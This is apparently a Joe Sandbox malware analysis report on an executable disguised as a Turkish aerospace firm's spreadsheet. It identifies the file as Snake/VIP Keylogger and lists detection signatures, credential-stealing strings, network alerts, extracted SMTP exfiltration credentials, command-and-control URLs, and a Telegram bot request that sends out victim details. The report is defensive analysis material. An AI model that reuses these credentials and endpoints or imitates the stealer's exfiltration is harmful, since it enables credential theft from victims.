Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Overview

General Information

Sample name:TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
renamed because original name is a hash value
Original sample name:TEKLF STE - TUSA TRK HAVACILIK UZAY SANAY_xlsx.exe
Analysis ID:1576573
MD5:711d0893a047d1aaabd5cb4c1fd8f4ad
SHA1:e555d7e2ec5f631e9317b62d004ff4069a4b20e2
SHA256:8b0966ac0b9d10efd2de59fd1f3949c0c5fd24a293193396022d949cecb8ef7d
Tags:exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Found API chain indicative of sandbox detection
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2dca0:$a1: get_encryptedPassword
          • 0x2e228:$a2: get_encryptedUsername
          • 0x2d913:$a3: get_timePasswordChanged
          • 0x2da2a:$a4: get_passwordField
          • 0x2dcb6:$a5: set_encryptedPassword
          • 0x309d2:$a6: get_passwords
          • 0x30d66:$a7: get_logins
          • 0x309be:$a8: GetOutlookPasswords
          • 0x30377:$a9: StartKeylogger
          • 0x30cbf:$a10: KeyLoggerEventArgs
          • 0x30417:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 16 entries
          SourceRuleDescriptionAuthorStrings
          0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2dca0:$a1: get_encryptedPassword
                  • 0x2e228:$a2: get_encryptedUsername
                  • 0x2d913:$a3: get_timePasswordChanged
                  • 0x2da2a:$a4: get_passwordField
                  • 0x2dcb6:$a5: set_encryptedPassword
                  • 0x309d2:$a6: get_passwords
                  • 0x30d66:$a7: get_logins
                  • 0x309be:$a8: GetOutlookPasswords
                  • 0x30377:$a9: StartKeylogger
                  • 0x30cbf:$a10: KeyLoggerEventArgs
                  • 0x30417:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 15 entries
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:41:29.137035+010028033053Unknown Traffic192.168.2.849708104.21.67.152443TCP
                  2024-12-17T09:41:32.141927+010028033053Unknown Traffic192.168.2.849710104.21.67.152443TCP
                  2024-12-17T09:41:38.351911+010028033053Unknown Traffic192.168.2.849716104.21.67.152443TCP
                  2024-12-17T09:41:44.336851+010028033053Unknown Traffic192.168.2.849720104.21.67.152443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T09:41:25.108285+010028032742Potentially Bad Traffic192.168.2.849706158.101.44.24280TCP
                  2024-12-17T09:41:27.514527+010028032742Potentially Bad Traffic192.168.2.849706158.101.44.24280TCP
                  2024-12-17T09:41:30.530148+010028032742Potentially Bad Traffic192.168.2.849709158.101.44.24280TCP
                  2024-12-17T09:41:33.514607+010028032742Potentially Bad Traffic192.168.2.849711158.101.44.24280TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeVirustotal: Detection: 29%Perma Link
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeReversingLabs: Detection: 36%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49707 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49725 version: TLS 1.2
                  Source: Binary string: wntdll.pdbUGP source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1450691724.0000000004070000.00000004.00001000.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1450829207.0000000004210000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1450691724.0000000004070000.00000004.00001000.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1450829207.0000000004210000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_001EDBBE
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001BC2A2 FindFirstFileExW,0_2_001BC2A2
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F68EE FindFirstFileW,FindClose,0_2_001F68EE
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_001F698F
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001ED076
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001ED3A9
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001F9642
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001F979D
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_001F9B2B
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_001F5C97
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D4F8E9h2_2_00D4F631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D4FD41h2_2_00D4FA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050EE501h2_2_050EE258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050ED7F9h2_2_050ED550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050E31E0h2_2_050E2DC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050E31E0h2_2_050E2DC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050ECF49h2_2_050ECCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050EF209h2_2_050EEF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050EE0A9h2_2_050EDE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_050E0673
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050EE959h2_2_050EE6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050E31E0h2_2_050E310E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050E2C19h2_2_050E2968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050EDC51h2_2_050ED9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050EFAB9h2_2_050EF810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_050E0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_050E0853
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050ED3A1h2_2_050ED0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050EEDB1h2_2_050EEB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050E0D0Dh2_2_050E0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050E1697h2_2_050E0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050EF661h2_2_050EF3B8

                  Networking

                  barindex
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2018/12/2024%20/%2007:04:25%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
                  Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49706 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49710 -> 104.21.67.152:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49708 -> 104.21.67.152:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49716 -> 104.21.67.152:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49720 -> 104.21.67.152:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49707 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001FCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_001FCE44
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2018/12/2024%20/%2007:04:25%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 17 Dec 2024 08:41:52 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
